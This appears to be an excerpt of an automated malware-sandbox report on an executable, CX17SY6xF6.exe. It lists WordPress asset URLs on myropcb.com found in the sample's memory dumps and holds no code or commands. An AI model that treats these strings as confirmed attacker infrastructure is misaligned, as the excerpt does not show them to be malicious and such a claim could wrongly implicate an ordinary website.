                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.1.
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/jquery-ui.min.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/style.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/hoverIntent.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
